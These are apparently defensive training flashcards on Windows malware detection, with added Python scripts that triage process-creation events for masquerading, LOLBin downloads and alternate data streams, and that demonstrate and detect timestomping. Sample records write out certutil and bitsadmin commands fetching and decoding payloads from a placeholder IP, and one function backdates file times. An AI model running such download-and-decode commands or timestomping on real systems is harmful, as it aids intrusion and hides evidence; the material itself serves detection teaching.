Section 1.3: Malware-ology Flashcards
What is the Malware Paradox?
That malware can hide, but it must run.
What are the three compromise types?
Active malware (currently running), dormant malware (present on disk but not running, or left behind by an incomplete cleanup), and living off the land (abuse of legitimate tools with little or no malware on disk).
What is Endpoint Detection and Response (EDR)?
A security solution that continuously monitors endpoints and collects endpoint data in real time, applies a set of rules to that data to detect suspicious activity, and gives responders the means to act on it.
What legitimate Windows process names does malware commonly masquerade under?
svchost.exe, iexplore.exe, explorer.exe, lsass.exe, win.exe, and winlogon.exe. Because the name is borrowed, never judge a process by its name alone: check the path it runs from (svchost.exe belongs in System32), its parent process (svchost.exe is started by services.exe, lsass.exe by wininit.exe), and its signature.
Name some common malware locations.
Temp, AppData, $Recycle.Bin, ProgramData, Windows, System32, WinSxS, System Volume Information, Program Files, and Program Files (x86). The first four are user-writable and need no privilege to drop into; the rest are system directories where a borrowed name blends in with hundreds of legitimate binaries.
What is the purpose of the LOLBAS Project (Living off the Land Binaries and Scripts)?
It documents legitimate Windows binaries, scripts, and libraries that attackers abuse, and categorizes each by the attacker use case it supports (for example download, execute, or decode), so defenders know which switches and behaviours to hunt for.
Which legitimate Windows binaries can adversaries abuse for stealthy file downloads?
bitsadmin.exe and certutil.exe. Both can fetch a file from a URL under cover of a trusted, signed system binary; certutil.exe can additionally base64-decode a downloaded payload that was obfuscated so that host-based security controls would not recognize it in transit.
When a binary or DLL path contains a colon (other than the drive-letter colon), what does that indicate?
An NTFS alternate data stream, for example notes.txt:payload.exe. The stream's content is not shown by a normal directory listing (dir /r lists it) and can be executed or loaded from there.
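The three indicators above (a borrowed system process name in the wrong place or under the wrong parent, certutil/bitsadmin used to fetch or decode a payload, and an alternate data stream named on a command line) can be checked mechanically over process-creation telemetry. The script below is an added example, not course material: the event records are constructed to look like Sysmon Event ID 1 or EDR process-creation data, and the expected-location/parent table and switch patterns are this example's own assumptions to extend for your environment.

```python
"""Triage Windows process-creation events for masquerading, LOLBin download/decode
and alternate-data-stream indicators. Added example; records and rule tables are
assumptions, not data from any real incident."""
import re
from ntpath import basename, dirname   # Windows path rules, usable on any host

# Where commonly borrowed names legitimately live and which process starts them
# (assumed table; explorer/iexplore parents vary, so only their path is checked).
EXPECTED = {
    "svchost.exe":  ({r"c:\windows\system32", r"c:\windows\syswow64"}, {"services.exe"}),
    "lsass.exe":    ({r"c:\windows\system32"}, {"wininit.exe"}),
    "winlogon.exe": ({r"c:\windows\system32"}, {"smss.exe"}),
    "explorer.exe": ({r"c:\windows"}, None),
    "iexplore.exe": ({r"c:\program files\internet explorer",
                      r"c:\program files (x86)\internet explorer"}, None),
}
# Switches behind the LOLBAS download/decode use cases of the two binaries.
LOLBIN_RULES = [
    ("certutil.exe",  re.compile(r"-urlcache\b|-verifyctl\b|-decode(?:hex)?\b", re.I)),
    ("bitsadmin.exe", re.compile(r"/transfer\b|/addfile\b|/download\b", re.I)),
]
URL_RE = re.compile(r"\b[a-z][a-z0-9+.-]*://\S+", re.I)
DRIVE_RE = re.compile(r"^[A-Za-z]:")


def _masquerade(image, parent):
    """Flag a well-known name running from the wrong directory or wrong parent."""
    name = basename(image).lower()
    if name not in EXPECTED:
        return []
    dirs, parents = EXPECTED[name]
    pname = basename(parent or "").lower()
    tags = []
    if dirname(image).lower() not in dirs:
        tags.append(f"masquerade:{name} outside expected directory ({dirname(image)})")
    if parents and pname not in parents:
        tags.append(f"masquerade:{name} started by {pname or 'unknown'}")
    return tags


def _lolbin(image, cmd):
    """Flag certutil/bitsadmin invoked with a fetch or decode switch."""
    name = basename(image).lower()
    tags = []
    for binary, switches in LOLBIN_RULES:
        m = switches.search(cmd) if name == binary else None
        if m:
            tag = f"lolbin:{name} {m.group(0).lower()}"
            tags.append(tag + " with URL" if URL_RE.search(cmd) else tag)
    return tags


def _ads(cmd):
    """A colon after the drive letter inside a file path names an alternate data stream."""
    tags = []
    for token in cmd.split():
        tok = token.strip("\"'")
        if URL_RE.match(tok):
            continue                          # scheme colon, not a stream
        rest = DRIVE_RE.sub("", tok)          # drop the "C:" prefix
        if ":" not in rest:
            continue
        host, _stream = rest.split(":", 1)
        if "\\" in host or "." in host:       # looks like a file, not a time like 12:30
            tags.append(f"ads:{tok}")
    return tags


def triage(event):
    """Return every indicator tag raised by one process-creation record."""
    cmd = event.get("cmd", "")
    return (_masquerade(event["image"], event.get("parent"))
            + _lolbin(event["image"], cmd) + _ads(cmd))


def triage_all(events):
    """Index -> tags for the records that raised anything."""
    return {i: t for i, e in enumerate(events) if (t := triage(e))}


# Constructed sample records (assumed), not from any real incident.
EVENTS = [
    {"image": r"C:\Windows\System32\svchost.exe", "parent": r"C:\Windows\System32\services.exe",
     "cmd": "svchost.exe -k netsvcs -p"},
    {"image": r"C:\Users\bob\AppData\Local\Temp\svchost.exe", "parent": r"C:\Windows\explorer.exe",
     "cmd": "svchost.exe"},
    {"image": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": r"certutil.exe -urlcache -split -f http://198.51.100.7/a.txt C:\Windows\Temp\a.txt"},
    {"image": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": r"certutil.exe -decode C:\Windows\Temp\a.txt C:\Windows\Temp\a.exe"},
    {"image": r"C:\Windows\System32\bitsadmin.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": r"bitsadmin.exe /transfer upd /download /priority high http://198.51.100.7/x.bin C:\ProgramData\x.bin"},
    {"image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\explorer.exe",
     "cmd": r'cmd.exe /c type "C:\ProgramData\notes.txt:hidden.ps1"'},
    {"image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\explorer.exe",
     "cmd": "cmd.exe /c dir C:\\"},
]

if __name__ == "__main__":
    for i, tags in triage_all(EVENTS).items():
        print(i, EVENTS[i]["cmd"])
        for t in tags:
            print("   ", t)
```

The first record (svchost.exe in System32 under services.exe) and the last (a plain dir) raise nothing; the rest each raise exactly the indicator the flashcards describe. Hunting at scale works the same way, with the rule tables fed from LOLBAS and from an inventory of where each system binary legitimately lives.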
List common defense evasion techniques attackers use to avoid detection.
Service hijacking/replacement, filename hijacking (masquerading as a legitimate process), process injection, DLL injection, alternate data streams, webshells/beacons, firmware-resident malware, A/V bypass, frequent recompilation (to defeat hash-based signatures), binary padding, packing/armoring, dormant malware, signing code (with stolen or fraudulently obtained certificates), anti-forensics/timestomping, rootkits, and fileless malware.
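Timestomping is one of the few techniques in that list that can be demonstrated, and caught, on any host. The script below is an added example, not course material: it backdates a file the way a stomping tool does (rewriting the user-settable access and modification times) and then applies the standard forensic check, which rests on the fact that user-space code cannot backdate the inode-change time (ctime) on a POSIX system; on NTFS the same reasoning is the comparison of $STANDARD_INFORMATION against $FILE_NAME timestamps. The file names, the 2009 date and the one-day threshold are assumptions, and on Windows Python reports creation time as st_ctime, so read the result there with that in mind.

```python
"""Timestomping and a forensic check for it. Added example; names, dates and the
threshold are assumptions."""
import os
import tempfile
from datetime import datetime, timezone


def timestomp(path, when):
    """Backdate the file's access and modification times to `when` (epoch seconds),
    as a stomping tool does. ctime is updated by the kernel to the current time."""
    os.utime(path, (when, when))


def check_timestomp(path, min_gap=24 * 3600):
    """Return the timestamp inconsistencies found on one file (empty list = none)."""
    st = os.stat(path)
    flags = []
    # A modification time far older than the inode-change time means the mtime
    # was written after the fact. Copies that preserve timestamps (cp -p, tar)
    # show the same pattern, so treat this as a lead to confirm, not a verdict.
    if st.st_ctime - st.st_mtime > min_gap:
        flags.append("mtime predates ctime")
    # Most stomping tools write whole seconds; a normally written file on a
    # modern filesystem carries a nanosecond fraction, so an exact zero stands out.
    if st.st_mtime_ns % 1_000_000_000 == 0:
        flags.append("mtime has zero sub-second part")
    return flags


def demo():
    """Create a normally written file and a stomped one; return both flag lists."""
    with tempfile.TemporaryDirectory() as d:
        fresh = os.path.join(d, "report.txt")
        stomped = os.path.join(d, "svchost.exe")   # borrowed name, per the list above
        for p in (fresh, stomped):
            with open(p, "w") as f:
                f.write("placeholder content\n")
        timestomp(stomped, int(datetime(2009, 1, 1, tzinfo=timezone.utc).timestamp()))
        return check_timestomp(fresh), check_timestomp(stomped)


if __name__ == "__main__":
    normal, stomped = demo()
    print("report.txt :", normal or "no inconsistencies")
    print("svchost.exe:", stomped)
```

The stomped file trips both checks; the fresh file trips neither, because its ctime and mtime were set by the same write. In a real examination the hit is the starting point: corroborate with $FILE_NAME timestamps, the USN journal, or prefetch and event-log timelines before drawing a conclusion.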
Why are code-signing private keys attractive to adversaries?
With a stolen key an adversary can sign malware so it passes controls that trust code from known publishers, gaining easy entry to operating systems that allow software from those publishers. Adobe and Opera (the browser vendor) are examples of publishers whose signing keys have been stolen.
Who is likely to have signed code?
Nation-state threat actors, who have the resources and access to steal or fraudulently obtain code-signing certificates.
Which publishers are likely to be legitimate?
Microsoft, Apple, and Google. Binaries carrying a valid signature from these publishers can usually be filtered out early during data reduction, but only when the signature actually verifies: a publisher name in version information or a self-assigned company string proves nothing, and a valid signature made with a stolen key still passes the check.